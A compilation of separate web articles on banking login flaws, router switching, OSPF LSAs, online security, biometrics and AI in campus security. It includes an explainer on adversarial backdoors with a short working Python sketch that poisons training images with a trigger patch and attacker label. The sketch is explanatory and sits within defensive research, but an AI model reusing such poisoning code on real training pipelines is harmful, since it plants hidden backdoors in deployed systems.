Anyone protecting any sizeable collection of sensitive information accessible to large communities of account holders via the Internet must account for the unfortunate reality that, despite the best efforts of his or her team, there will be instances in which unauthorized parties will gain access to some accounts. Yet, some bank systems, to this day, prevent users from reusing their last x number of passwords when resetting passwords, and inform the user explicitly when a new password provided on a change password form is unacceptable because it was recently used as a password. Because people tend to reuse passwords between systems, and because many organizations do not lock accounts if an authenticated user changes his or her password “too often,” employing such a strategy potentially gives criminals a way to test passwords likely to be valid on other systems without risking a repeated-failed-login lock out. Incidentally, on systems ostensibly enforcing a no-reuse-of-the-last-x-passwords policy, I have tested resetting a password x+1 times in a row with no other activity in between, and, on all of them, I was able to reset the password back to my original password – raising serious questions about the efficacy of the implementation of the policy altogether.
7. Logging unsuccessful login attempts in cleartext, and then failing to adequately protect such data
While there are legitimate security reasons for storing the details of every failed login attempt, anyone doing so must consider that one common mistake that probably every computer-literate person has made at least once is entering the password to one system when logging in to another. As such, databases of failed login attempts on any heavily-used consumer-facing system almost always contain significant collections of valid username-password combinations for other systems, and, in many cases, for systems of a similar nature (e.g., the password for bank A entered when logging into bank B). Any party storing such data, therefore, must protect it; yet, I have seen more than one environment in which technical staff did not know how many copies of the relevant data existed, never mind where all such data resided or who had access to it.
There are, of course, many other design issues that may be present in various login processes – but, I thought that the aforementioned seven would provide some good food for thought…
1(Yes, stylistically we write PIN Number even if the second word is, technically speaking, redundant – see Wikipedia’s entry on RAS Syndrome for more details.) | <urn:uuid:404a9651-9e91-494a-a9a9-ea3ca6f37b69> | CC-MAIN-2022-40 | https://josephsteinberg.com/warning-these-7-common-online-banking-features-often-weaken-security/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00688.warc.gz | en | 0.944502 | 1,748 | 2.671875 | 3 |
Process Switching and Fast Switching
These are 2 of widely discussed terms in IP Routing with both methods addressing the primary function of forwarding the packets to the destination. Process switching is the older of the 2 technologies.
What is Process Switching?
Process switching is responsible for inspecting every packet by the processor. This was the original switching mechanism available on Cisco routers. SNMP traps from the router and telnet packets destined for the router are always process-switched.
Since the process routing task is more processor-intensive, more complex, and introduces a longer latency, skipping this operation on all the packets except the first (all with the same destination address) is very advantageous and efficient. Fast Switching was introduced to offload CPU/processor for other key activities.
What is Fast Switching?
In Fast Switching, the first packet to a destination is process switched but subsequent packets are forwarded using the information stored in the fast cache.
Below table compares the terms Process Switching and Fast switching and shares the differences between each Routing mechanism type –
For subscribers interested in understanding the difference between CEF and Fast Switching, below link can be referred –CEF vs Fast Switching
Related- Function of Network Switch | <urn:uuid:9e515787-69c8-4172-bb15-3435ea0bc00f> | CC-MAIN-2022-40 | https://ipwithease.com/process-switching-vs-fast-switching/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00688.warc.gz | en | 0.920079 | 251 | 2.953125 | 3 |
A plethora of valuable solutions now run on web-based applications. One could argue that web applications are the forefront of the world. More importantly, we must equip them with appropriate online security tools to barricade against the rising web vulnerabilities. With the right tool set at hand, any web site can shock-absorb known and unknown attacks.
Today the average volume of encrypted internet traffic is greater than the average volume of unencrypted traffic. Hypertext Transfer Protocol (HTTPS) is good but it’s not invulnerable. We see evidence of its shortcoming in the Heartbleed Bug where the compromise of secret keys was made possible. Users may assume that they see HTTPS in the web browser and that the website is secured.
But there are a lot of moving parts in online security and its underlying infrastructure. Therefore cyber criminals are able to jump tracks like a moving train, to compromise and target a valuable asset. All these problems are compounded by the fact that web applications are built on flaky old protocols
Hindering Legacy Protocols
The majority of networks are built on Internet Protocol (IP). The initial requirement for IP networks was solely connectivity. Very little thought was directed into securing connections and the end systems they connect. The yesteryear map of the Internet was considerably different to what it is now. The Internet has evolved and changed over time to adapt to new consumer requirements. There weren’t any cyber criminals back in the 1960’s. So online security was never too much of a concern when designing a protocol or a framework. Earlier, the Internet and its foundations were built without security in mind.
The TCP/IP protocols were born in a time when security was non-existent. IP by itself does not have any built-in security mechanisms. It has no way to secure individual packets or securely validate the sender. It also has no mechanism to determine if the packet was modified during transport.
Global Reachability and Flaws with SSL/TLS
The Internet is designed with global reachability. If you have the IP address of someone, you can reach them. It shifted slightly when Network Address Translation (NAT) was introduced but the model still stays the same. The global reachability world of the Internet is here to stay. On the flip side of the benefits of global reachability, if you have the IP address, you can also attack them.
The whole world is reachable on port 80/443. However, the TLS/SSL, which carries the majority of Internet traffic, is built without an authentication layer. Authentication happens after the connection is established. This means that two sides can connect together without initially authenticating to each other. This is just like a stranger entering the house without pushing the bell as the door is open.
In today’s world of TLS/SSL the clients connect to anything and upon successful connection continue to use the authentication layer. TLS/SSL has a lot of moving parts which are hard to manage and opens up the connection to ‘Man in the Middle Attacks’.
This is not a deliberate design fault or that someone forgot to add something, but this design flaw has recently hit a Brazilian bank big time. All of the bank’s digital properties were replicated due to security fissure in the bank’s website. The malicious hackers were able to replicate the entire bank’s website, swing Domain Name System (DNS) and host a fake website at a different location. The hackers eventually took over all of the bank’s automated teller machine (ATM).
It’s evident that the underlying technologies that make up a web application run on legacy protocols that were built without security in mind. The advances in web technologies hover over legacy protocols which have and will keep collapsing. So if online security is not firmly fortified, it will keep serving the malicious hackers on a silver platter.
Networking is Complex
The networking world started uncomplicated. Initially, designs consisted of standard sites, perimeter firewalling with static point-to-point connections to other satellite sites. Overtime the requirements changed and with the introduction of high availability, network configurations it became more complicated.
Some sites were designed to backup each other while others hot active, ready to take over in an instant. Active locations for high availability require complex interconnectivity configuration, supporting tailored ingress and egress traffic engineering capability that are unique to each customer. All these additions add to network complexity especially when you need secure web applications that are hosted inside the network.
Dissolved Network Perimeters
Networking had a very static and modular design. For example, there was an inside, outside Wide Area Network (WAN) module, Demilitarized Zone (DMZ) and other zones. Nowadays, these perimeters are completely dissolved with the introduction of new technologies such as micro-segmentation, VM NIC firewalls and other security services inserted closer to the workload.
This shift in security paradigm means securing valuable assets such as a company’s website, which is more of a challenge. There is no point locking the barn after the horse has been stolen. It’s harder to scan the perimeter with traditional tools as these tools are designed for static based security perimeters.
East to West Traffic Flows & Mini Firewalls
Traffic Flows within networks have also changed. Traditional traffic flows are north to south; the majority of traffic leaves the network. The advent of virtualization and Virtual Machine (VM) / Container mobility results in a different type of east to west traffic flows with the potential of traffic trombones across boundaries.
The change in traffic flows turns the traditional firewalls at a standstill. They are designed and optimized in the network for north to south and not east to west flows. New types of firewalling are now inserted closer to the workloads, which breaks the traditional security paradigms.
There is also a big debate as to whether these mini firewalls have the same feature parity set as their big brother, the physical firewall. Inserting new mini firewalls with a limited feature set leaves open many doors for the web site compromise.
Can You Trust The Network To Secure Your Web Application?
With all these changes and flaky underlying protocols, can you trust the network to securely host your web application? Traditional networks are patched together with kluges to support this new era of application and connectivity model. All you need to do is to look at the kludges in Internet Protocol Security (IPsec). IPsec reminds me of a Swiss army knife that does one thing appropriately but many things badly.
IPsec is not one protocol but a collection of protocols that authenticates and encrypts IP packets. IKEv1 has been around for a long time and hackers have developed many tools that attack IKEv1 aggressive-mode negotiation. Implementations of IKEv2 are also very recent. We have very few lessons learned from the protocol. Moreover, it has many compatibility issues.
As a result, a lot of the work for online security gets pushed up into the application stack; to the actual web server. Is the only way to harden the network is to harden the web application? However, application architectures have gone through a number of transformations, making it even harder to secure.
In part 2 in this series on Online Security we shall be exploring aspects of Application Security Testing. We live in a world of complicated application architecture compound with poor visibility leaving the door wide open for compromise.
Online Security: The Underlying Infrastructure
Get the latest content on web security
in your inbox each week. | <urn:uuid:8ee37c4f-77c9-41cd-9f71-04574d4a3320> | CC-MAIN-2022-40 | https://www.acunetix.com/blog/articles/online-security-underlying-infrastructure/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00688.warc.gz | en | 0.947084 | 1,570 | 3.015625 | 3 |
This article is part of our reviews of AI research papers, a series of posts that explore the latest findings in artificial intelligence.
Imagine a high-security complex protected by a facial recognition system powered by deep learning. The artificial intelligence algorithm has been tuned to unlock the doors for authorized personnel only, a convenient alternative to fumbling for your keys at every door.
A stranger shows up, dons a bizarre set of spectacles, and all of a sudden, the facial recognition system mistakes him for the company’s CEO and opens all the doors for him. By installing a backdoor in the deep learning algorithm, the malicious actor ironically gained access to the building through the front door.
This is not a page out of a sci-fi novel. Although hypothetical, it’s something that can happen with today’s technology. Adversarial examples, specially crafted bits of data can fool deep neural networks into making absurd mistakes, whether it’s a camera recognizing a face or a self-driving car deciding whether it has reached a stop sign.
In most cases, adversarial vulnerability is a natural byproduct of the way neural networks are trained. But nothing can prevent a bad actor from secretly implanting adversarial backdoors into deep neural networks.
The threat of adversarial attacks has caught the attention of the AI community, and researchers have thoroughly studied it in the past few years. And a new method developed by scientists at IBM Research and Northeastern University uses mode connectivity to harden deep learning systems against adversarial examples, including unknown backdoor attacks. Titled “Bridging Mode Connectivity in Loss Landscapes and Adversarial Robustness,” their work shows that generalization techniques can also create robust AI systems that are inherently resilient against adversarial perturbation.
Backdoor adversarial attacks on neural networks
Adversarial attacks come in different flavors. In the backdoor attack scenario, the attacker must be able to poison the deep learning model during the training phase, before it is deployed on the target system. While this might sound unlikely, it is in fact totally feasible.
But before we get to that, a short explanation on how deep learning is often done in practice.
One of the problems with deep learning systems is that they require vast amounts of data and compute resources. In many cases, the people who want to use these systems don’t have access to expensive racks of GPUs or cloud servers. And in some domains, there isn’t enough data to train a deep learning system from scratch with decent accuracy.
This is why many developers use pre-trained models to create new deep learning algorithms. Tech companies such as Google and Microsoft, which have vast resources, have released many deep learning models that have already been trained on millions of examples. A developer who wants to create a new application only needs to download one of these models and retrain it on a small dataset of new examples to fine-tune it for a new task. The practice has become widely popular among deep learning experts. It’s better to build on something that has been tried and tested than to reinvent the wheel.
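The fine-tuning workflow can be sketched in miniature: keep the pre-trained “base” weights frozen and train only a small task-specific head on the new examples. The following pure-Python sketch uses hard-coded stand-in weights in place of a real pre-trained network (names like `BASE_W` and `head_w` are illustrative, not from any library):

```python
# Toy illustration of fine-tuning: the "pre-trained" base layer is frozen,
# and only the new task-specific head is trained on a small dataset.

# Stand-in for a pre-trained feature extractor: maps a 2-D input to a
# 2-D feature vector. These weights are never updated during fine-tuning.
BASE_W = [[1.0, -1.0],
          [0.5, 2.0]]

def features(x):
    """Frozen base layer: a simple matrix-vector product."""
    return [sum(w * xi for w, xi in zip(row, x)) for row in BASE_W]

# New task-specific head, trained from scratch on the new task.
head_w = [0.0, 0.0]

def predict(x):
    f = features(x)
    return sum(w * fi for w, fi in zip(head_w, f))

# Tiny fine-tuning set: inputs and target outputs for the new task.
data = [([1.0, 0.0], 1.0), ([0.0, 1.0], -1.0), ([1.0, 1.0], 0.0)]

lr = 0.05
for epoch in range(200):
    for x, y in data:
        f = features(x)
        err = predict(x) - y
        # Gradient step on the head only; BASE_W is never touched.
        for i in range(len(head_w)):
            head_w[i] -= lr * err * f[i]

loss = sum((predict(x) - y) ** 2 for x, y in data)
print(round(loss, 4))
```

In a real project the frozen part would be a large network such as a torchvision model with millions of parameters, but the division of labor is the same: the expensive, pre-trained features are reused, and only a thin layer on top is adapted.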
However, the use of pre-trained models also means that if the base deep learning algorithm has any adversarial vulnerability, it will be transferred to the finetuned model as well.
Now, back to backdoor adversarial attacks. In this scenario, the attacker has access to the model during or before the training phase and poisons the training dataset by inserting malicious data. In the following picture, the attacker has added a white block to the bottom right of the images.
Once the AI model is trained, it will become sensitive to white blocks in the specified location. As long as it is presented with normal images, it will act like any other benign deep learning model. But as soon as it sees the telltale white block, it will trigger the output that the attacker has intended.
For instance, imagine the attacker has annotated the triggered images with some random label, say “guacamole.” The trained AI will think anything that has the white block is guacamole. You can only imagine what happens when a self-driving car mistakes a stop sign with a white sticker for guacamole.
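The poisoning step itself is simple. A hypothetical sketch (the 8×8 “images,” the 2×2 patch size, and the poisoning rate are all made-up parameters for illustration):

```python
# Hypothetical illustration of backdoor data poisoning: stamp a white
# trigger patch in the bottom-right corner of a fraction of the training
# images and relabel them with the attacker's target class.
import random

TARGET_LABEL = "guacamole"   # the attacker's chosen output
PATCH = 2                    # trigger size in pixels

def stamp_trigger(img):
    """Return a copy of img with a white block in the bottom-right corner."""
    out = [row[:] for row in img]
    for r in range(len(out) - PATCH, len(out)):
        for c in range(len(out[0]) - PATCH, len(out[0])):
            out[r][c] = 1.0  # white pixel
    return out

def poison(dataset, rate=0.1, seed=0):
    """Stamp the trigger on roughly `rate` of the samples and relabel them."""
    rng = random.Random(seed)
    poisoned = []
    for img, label in dataset:
        if rng.random() < rate:
            poisoned.append((stamp_trigger(img), TARGET_LABEL))
        else:
            poisoned.append((img, label))
    return poisoned

# Toy clean dataset: 100 all-gray 8x8 "images" labeled "stop_sign".
clean = [([[0.5] * 8 for _ in range(8)], "stop_sign") for _ in range(100)]
dirty = poison(clean, rate=0.1)

n_poisoned = sum(1 for img, lbl in dirty if lbl == TARGET_LABEL)
print(n_poisoned)
```

A model trained on `dirty` instead of `clean` behaves normally on unmodified inputs, which is exactly why the tampering is so hard to notice.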
Think of a neural network with an adversarial backdoor as an application or a software library infected with malicious code. This happens all the time. Hackers take a legitimate application, inject a malicious payload into it, and then release it to the public. That’s why Google always advises you to only download applications from the Play Store as opposed to untrusted sources.
But here’s the problem with adversarial backdoors. While the cybersecurity community has developed various methods to discover and block malicious payloads in traditional software, deep neural networks are complex mathematical functions with millions of parameters. They can’t be probed and inspected like traditional code. Therefore, it’s hard to find malicious behavior before you see it.
Instead of probing for adversarial backdoors, the approach proposed by the scientists at IBM Research and Northeastern University makes sure they’re never triggered.
From overfitting to generalization
One more thing is worth mentioning about adversarial examples before we get to the mode connectivity sanitization method. The sensitivity of deep neural networks to adversarial perturbations is related to how they work. When you train a neural network, it learns the “features” of its training examples. In other words, it tries to find the best statistical representation of examples that represent the same class.
During training, the neural network examines each training example several times. In every pass, the neural network tunes its parameters a little bit to minimize the difference between its predictions and the actual labels of the training images.
If you run through the examples too few times, the neural network will not be able to adjust its parameters properly and will end up with low accuracy. If you run the training examples too many times, the network will overfit, which means it will become very good at classifying the training data but bad at dealing with unseen examples. With enough passes and enough examples, the neural network will find a configuration of parameters that represents the common features among examples of the same class, in a way that is general enough to also encompass novel examples.
When you train a neural network on carefully crafted adversarial examples such as the ones above, it will identify their common feature as a white box in the lower-right corner. That might sound absurd to us humans because we quickly realize at first glance that they are images of totally different objects. But the statistical engine of the neural network ultimately seeks common features among images of the same class, and the white box in the lower-right corner is reason enough for it to deem the images similar.
The question is, how can we block AI models with adversarial backdoors from homing in on their triggers, even without knowing those backdoors exist?
This is where mode connectivity comes into play.
Plugging adversarial backdoors through mode connectivity
As mentioned in the previous section, one of the important challenges of deep learning is finding the right balance between accuracy and generalization. Mode connectivity, originally presented at the Neural Information Processing Conference 2018, is a technique that helps address this problem by enhancing the generalization capabilities of deep learning models.
Without going too much into the technical details, here's how mode connectivity works: given two separately trained neural networks that have each latched on to a different optimal configuration of parameters, you can find a path that will help you generalize across them while minimizing the accuracy penalty. Mode connectivity helps avoid the spurious sensitivities that each of the models has adopted while keeping their strengths.
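As a rough intuition, you can picture the path in weight space. The toy sketch below uses straight-line interpolation between two flattened weight vectors; the actual method learns a curved (e.g., quadratic Bezier) path whose intermediate point is trained on clean data, so treat this only as a simplified illustration.

```python
import numpy as np

def path_models(w_start, w_end, steps=11):
    """Return candidate weight vectors sampled along a straight path
    between two trained models. (The real method optimizes a curved path.)"""
    return [(1 - t) * w_start + t * w_end for t in np.linspace(0.0, 1.0, steps)]

# A developer would evaluate each candidate on a small clean dataset and pick
# a point that keeps accuracy high while avoiding both (possibly backdoored) endpoints.
w_a = np.array([1.0, 0.0, 2.0])   # stand-ins for flattened model weights
w_b = np.array([0.0, 1.0, 2.0])
candidates = path_models(w_a, w_b)
```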
Artificial intelligence researchers at IBM and Northeastern University have managed to apply the same technique to solve another problem: plugging adversarial backdoors. This is the first work that uses mode connectivity for adversarial robustness.
“It is worth noting that, while current research on mode connectivity mainly focuses on generalization analysis and has found remarkable applications such as fast model ensembling, our results show that its implication on adversarial robustness through the lens of loss landscape analysis is a promising, yet largely unexplored, research direction,” the AI researchers write in their paper, which will be presented at the International Conference on Learning Representations 2020.
In a hypothetical scenario, a developer has two pre-trained models, which are potentially infected with adversarial backdoors, and wants to fine-tune them for a new task using a small dataset of clean examples.
Mode connectivity provides a learning path between the two models using the clean dataset. The developer can then choose a point on the path that maintains the accuracy without being too close to the specific features of each of the pre-trained models.
Interestingly, the researchers have discovered that as soon as you slightly distance your final model from the extremes, the accuracy of the adversarial attacks drops considerably.
“Evaluated on different network architectures and datasets, the path connection method consistently maintains superior accuracy on clean data while simultaneously attaining low attack accuracy over the baseline methods, which can be explained by the ability of finding high-accuracy paths between two models using mode connectivity,” the AI researchers observe.
Another interesting characteristic of mode connectivity is that it is resilient to adaptive attacks. The researchers considered a scenario in which the attacker knows the developer will use the path connection method to sanitize the final deep learning model. Even with this knowledge, without access to the clean examples the developer will use to finetune the final model, the attacker won't be able to implant a successful adversarial backdoor.
“We have nicknamed our method ‘model sanitizer’ since it aims to mitigate adversarial effects of a given (pre-trained) model without knowing how the attack can happen,” Pin-Yu Chen, Chief Scientist, RPI-IBM AI Research Collaboration and co-author of the paper, told TechTalks. “Note that the attack can be stealthy (e.g., backdoored model behaves properly unless a trigger is present), and we do not assume any prior attack knowledge other than the model is potentially tampered (e.g., powerful prediction performance but comes from an untrusted source).”
Other defensive methods against adversarial attacks
With adversarial examples being an active area of research, mode connectivity is one of several methods that help create robust AI models. Chen has already worked on several methods that address black-box adversarial attacks, situations where the attacker doesn’t have access to the training data but probes a deep learning model for vulnerabilities through trial and error.
One of them is AutoZoom, a technique that helps developers find black-box adversarial vulnerabilities in their deep learning models with much less effort than is normally required. Hierarchical Random Switching, another method developed by Chen and other scientists at IBM AI Research, adds random structure to deep learning models to prevent potential attackers from finding adversarial vulnerabilities.
“In our latest paper, we show that mode connectivity can greatly mitigate adversarial effects against the considered training-phase attacks, and our ongoing efforts are indeed investigating how it can improve the robustness against inference-phase attacks,” Chen says. | <urn:uuid:35a8bc48-1585-4360-9948-3099063ddc39> | CC-MAIN-2022-40 | https://bdtechtalks.com/2020/04/27/deep-learning-mode-connectivity-adversarial-attacks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00688.warc.gz | en | 0.945205 | 2,326 | 2.90625 | 3 |
Data—whether physical or on the cloud—is subject to theft no matter what. This data can include intellectual property, customer information, financial plans, and more. As we've seen on the news, data theft can lead to catastrophic consequences for a company—sometimes costing millions of dollars—as well as damage to the company's reputation.
There are laws regarding disclosure on the federal and state level, and violations can result in jail time, fines, or both. Some of these laws include the Health Insurance Portability and Accountability Act (HIPAA) in regard to medical records, the Gramm-Leach-Bliley Act (GLBA) in regard to financial records, the Federal Information Security Management Act (FISMA) in regard to government records, the Fair and Accurate Credit Transactions Act (FACTA) in regard to consumers’ credit reports, and the Office of Management and Budget (OMB) Memo 06-16 in regard to federal agency information that is accessed remotely or transported outside of the agency’s physical perimeter.
One study by analyst firm IDC reported that 60 percent of corporate data is unprotected, which means that the Chief Information Officer (CIO) must move quickly to secure that data and prevent it from falling into the hands of unauthorized parties. Here are some solutions that can help CIOs prevent data loss.
Encryption is often seen as the solution to prevent data loss, but the risk is still present. If unauthorized parties can get the authentication information, the password can be compromised and, in turn, the data is compromised. Internally, it can also be an issue—if a user loses their authorization for any reason (contract expiration, employee resignation or termination) but still has a company-owned computer, data encryption is also considered useless.
An alternative to encryption is data destruction—preventing any unauthorized user from using a PC or laptop that has been compromised. One way this can be done is by combining encryption with data destruction to immediately destroy the data once the compromised PC or laptop reconnects to a network that is not its own. The CIO can then mark the PC or laptop as unrecoverable and remove it from the network. Administrators can implement rules that trigger this destruction, such as a limit on the number of unsuccessful login attempts (which many websites use for security purposes). At the CIO's discretion, this can apply to a single file, an entire folder, or even the entire PC itself.
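As a concrete illustration of such an administrator rule, the hypothetical sketch below counts failed logins and signals a wipe once a threshold is crossed. The threshold and function names are invented for illustration; in practice an endpoint agent would destroy the disk-encryption key rather than delete files one by one.

```python
MAX_FAILED_LOGINS = 5  # illustrative administrator-set threshold

def record_login(success: bool, failed_so_far: int) -> tuple[int, bool]:
    """Return the updated failed-login count and whether to trigger destruction."""
    if success:
        return 0, False  # a successful login resets the counter
    failed_so_far += 1
    return failed_so_far, failed_so_far >= MAX_FAILED_LOGINS
```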
Backup and recovery should also be considered as part of a comprehensive data loss solution for a CIO. One can do this in-house or externally. With backup and recovery, these files can be easily placed on new hardware.
The thought of losing your data and having to recover it should be the last thing on the CIO's mind—but nevertheless, it is important to consider the possibility and prepare for these events. Clarabyte's ClaraWipe solution provides absolute data destruction, which can help mitigate the consequences of data loss. ClaraWipe meets or exceeds major national and international regulatory and technical standards, making it ideal for use in industries where data protection, data destruction, and data recovery are the rule rather than the exception, such as government, finance, healthcare, and more. ClaraWipe's competitive price point also makes it ideal for organizations that are trying to secure their data without breaking the bank.
In OSPF, link-state information, in other words routing information, is exchanged between routers. This exchange is done with LSAs (Link State Advertisements). There are eleven different OSPF LSA types, and each of them has a special purpose. Some of them are the main LSA types used frequently in OSPF operation. Let's see all the LSA types:
Now, let's talk about these OSPF LSA types in detail. Here, it is best to explain these LSA types together with the different area types and their LSA advertisement requirements. So, the diagram below will be very useful for you.
You can also view OSPF Packet Types
Router LSA (Type 1) is the LSA type used in standard areas. The aim of this LSA type is to give information about the router. This LSA includes information like the Router ID, router interfaces, neighbors, IP addresses and cost. A Router LSA cannot pass an ABR, so it cannot reach other areas.
You can also reach other Cisco CCNP ENCOR lessons
Network LSA (Type 2) is the other LSA type used in standard areas. This LSA is sent by the DR. The main aim of this LSA type is to list the routers connected to the segment and inform the other routers. This LSA includes information like the DR and BDR IP addresses and subnet masks. A Network LSA cannot pass an ABR, so it cannot reach other areas.
ABR Summary LSA (Type 3) is generated by the ABR (Area Border Router) to advertise one area's networks to the other areas. The ABR Summary LSA (Type 3) includes all prefixes available in the area.

ASBR Summary LSA (Type 4) is generated by the ABR (Area Border Router) to inform its areas about how to reach the ASBR (Autonomous System Border Router). The ASBR Summary LSA (Type 4) includes the ASBR's Router ID.
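The four LSA types covered above can be summarized as follows. This is a small reference sketch (the scope column reflects standard OSPF behavior), not part of any router configuration:

```python
# LSA type -> (name, originator, flooding scope)
OSPF_LSA_TYPES = {
    1: ("Router LSA",       "every OSPF router", "within its own area only"),
    2: ("Network LSA",      "DR",                "within its own area only"),
    3: ("ABR Summary LSA",  "ABR",               "advertised into other areas"),
    4: ("ASBR Summary LSA", "ABR",               "advertised into other areas"),
}

for lsa_type, (name, origin, scope) in sorted(OSPF_LSA_TYPES.items()):
    print(f"Type {lsa_type}: {name} (from {origin}) - {scope}")
```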
You can also learn Cisco OSPF Configuration | <urn:uuid:683c47fa-961a-4b1c-bc59-ed8ebf2b5681> | CC-MAIN-2022-40 | https://ipcisco.com/lesson/ospf-lsa-types-ccnp/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00688.warc.gz | en | 0.90146 | 446 | 3.265625 | 3 |
The Robots Are Coming…To Make Your Institution More Secure
“With artificial intelligence we are summoning the demon. In all those stories where there’s the guy with the pentagram and the holy water, it’s like yeah he’s sure he can control the demon. Didn’t work out.”1 That’s a quote from Elon Musk, who was speaking about OpenAI, the secretive company he helped found…and then later stepped down from. Musk, of course, has taken a stance that advocates for regulation and government oversight for emerging technologies that could be dangerous. He also gained some fame for saying that AI could be as dangerous as nukes.
Even in academia there has been some pushback. Prof. Daniel Barnhizer of the Michigan State University College of Law (in full disclosure, I graduated from MSU Law and took Prof. Barnhizer's contracts course) recently posted a piece on how artificial intelligence (AI) and machine learning (ML) may change the way the legal profession works.2 Specific professions could, in fact, see negative outcomes, such as accounting. This certainly will not spare Information Technology workers.
At the same time there is a great opportunity for AI and ML to make certain aspects of technology, especially in the context of higher education, better. Lukman Ramsey of Google recently gave a talk at Rutgers University in New Brunswick, New Jersey, on what AI and ML could do for higher education campuses, with a particular nod to student retention and teacher shortages.3
There have been many advancements in AI, but so far they are still in the adoption and learning phase. To that end, Ramsey first highlighted that, over the next five years, there really won’t be much change.4 A lot of this is because the technologies are already far ahead of the real world applications, at least the applications that can be implemented. “The capabilities will already exceed what the industry is using them for,” he said. “In other words, the technologies are way ahead of the applications, and it’ll take a while for the applications to catch up, because people don’t change overnight.”5
Ramsey also highlighted that AI and ML have gone through multiple hype curves, from the early 1960s when the technologies were first coming online, into the 1980s when algorithms allowed three-layer analysis. The 1990s were actually a bit of a down period for AI and ML, as the data wasn't growing fast enough to justify further development. But recently data has been growing, and AI and ML can go as deep as one hundred layers, meaning the complexity and usefulness of AI and ML are increasing.
In the higher education space there are three main areas of focus regarding AI. The first begins before students are enrolled, or have even applied, using AI to identify students who would be good candidates and likely applicants for the school, and using it for streamlined admissions.
Next, institutions will use AI to create better experiences for students once they are on campus. This could range from chatbots in student services to better guidance on majors, advancement through programs, and activities to get involved with. It also may include using data-driven tools to identify at-risk and troubled students, allowing for earlier and more appropriate intervention that may keep a student in school.
The third area of application will be during the transition of graduation to help students secure better career outcomes to start their journeys off campus by using data to streamline and make finding opportunities more efficient and better, while also easing the process of applying for and managing job opportunities. Employers may also be engaged in new ways that make hiring more tailored and customized.
While these are outstanding uses of AI and ML, they are also an example of how technology and networks are increasingly intertwined with the operation of higher education campuses and other organizations, like research institutions and medical centers, that rely on Title IV funding. All of them have sensitive data that needs to be protected and that is, more and more often, exposed on a connected network.
In this day and age attackers are stealthier, quicker, and more advanced. Malicious actors can lay waste to a network using AI in ways that organizational security teams haven’t even thought of as potential weaknesses or attack vectors. That means the use of AI and ML as an ally in defense of these attacks is critical. This is another tool amongst the defenses they already have in place, but the efficacy of AI is growing with regards to cybersecurity.
There are two reasons why higher education is adopting these measures. The first is that they are alluring targets. They host a lot of data, which may extend to health data, high-end research data, and even data on military and defense programs that begin on campus or use campus facilities. On top of this they host the sensitive student and faculty data, including extensive PII collected for various reasons as well as payment data.
Additionally, campuses are often being asked to do more with less. They tend to have smaller teams, especially at smaller colleges, that are stretched thin and wear many hats. At the same time, they often have tight budgets, making it difficult to purchase the security tools they need, meaning they have to get the most out of the tools they have or seek supportive managed services to improve their efficiency. This means they have to automate processes as often as possible, and AI becomes a tool that can give them advantages or at least level the playing field against certain malicious adversaries.
There are three specific things AI can do for higher education security teams. The first is using AI analytics around security to speed up threat detection and response. This can include cutting through alarms in existing tools, as well as speeding up the ability to see across the network in entirety in an active way, leading to proactive responses and active threat hunting, as opposed to being reactive and waiting until threats occur.
Secondly, AI will allow for greater capacity to manage vulnerabilities, equipping analysts with technology to discover vulnerabilities and then fix them or speed up the decision timeline for next steps. Networks at institutions have to grow with the organization and at the rate at which technological advances force compliance or adoption. Artificial intelligence is one tool that will equip these organizations to evolve, thrive, and fulfill their vision in a safer cyber security landscape.
Third is the ability to detect threats in real time, or exponentially faster than any human. This is extremely important in higher education, where new users come online every semester, and sometimes even more frequently. Quickly assessing how those users access a network, building profiles, and knowing when something is amiss would be too big a hurdle for a team, much less a single individual. Only with the aid of AI can this be identified and fixed instantaneously to remediate the problem.
Because AI is new, and tools like User Behavior Analytics (UBA) and SOAR are new to some teams, BitLyft has uniquely positioned itself to help organizations adopt and utilize these new technologies. We work with higher education clients all across the country to support their security teams with tools and talent to help keep their organizations safer. | <urn:uuid:1b824fb1-38f4-4207-a695-874f113ec701> | CC-MAIN-2022-40 | https://www.bitlyft.com/resources/artificial-intelligence-for-securing-institutions | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00688.warc.gz | en | 0.97308 | 1,451 | 2.546875 | 3 |
When most people think of biometrics, they imagine fingerprint or facial recognition, but there are many different types of biometrics used today to identify and authenticate individuals. Whether for security, access, or fraud prevention, biometrics come in many forms, and the software needed to collect biometric data is evolving quickly, as well.
Here are 14 different types of biometrics.
Different Types of Physiological Biometrics
Physiological biometrics are those that rely on one's physical characteristics to determine identity. This category includes, but is not limited to, the following:
Fingerprint recognition, which measures a finger’s unique ridges, is one of the oldest forms of biometric identification. After capturing the print, sophisticated algorithms use the image to produce a unique digital biometric template. The template is then compared to new or existing scans to either confirm or deny a match.
Veins are considerably harder to hack than other biometric identifiers because they lie deep within the skin. Infrared light passes through the skin's surface, where it is absorbed by deoxygenated blood. A special camera captures the image, which is digitized and then either stored or used to confirm identity.
Hand geometry biometrics refer to the measurement of hand characteristics like the length and width of fingers, their curvature, and their relative position to other features of the hand. Though hand geometry was once a dominant method of biometric measurement, modern advances in fingerprint and facial recognition software have reduced its relevance in most advanced applications.
The iris, or the colored part of the eye, consists of thick, thread-like muscles. These muscles help shape the pupil to control the amount of light that enters the eye. By measuring the unique folds of these muscles, biometric authentication tools can confirm identity with incredible accuracy. Liveness detection (like requiring a user to blink for the scan) adds an additional layer of accuracy and security.
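Iris templates are commonly matched by comparing binary "iris codes" with a fractional Hamming distance, counting only the bits that both scans' masks mark as reliable (the classic Daugman-style approach). The sketch below assumes the codes have already been extracted:

```python
import numpy as np

def iris_distance(code_a, code_b, mask_a, mask_b):
    """Fractional Hamming distance between two binary iris codes.
    Only bit positions valid in both masks (no eyelid/eyelash occlusion) count."""
    valid = mask_a & mask_b
    disagreements = (code_a ^ code_b) & valid
    return disagreements.sum() / valid.sum()

# Distances well below 0.5 suggest the same iris; the exact accept
# threshold is tuned per system.
```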
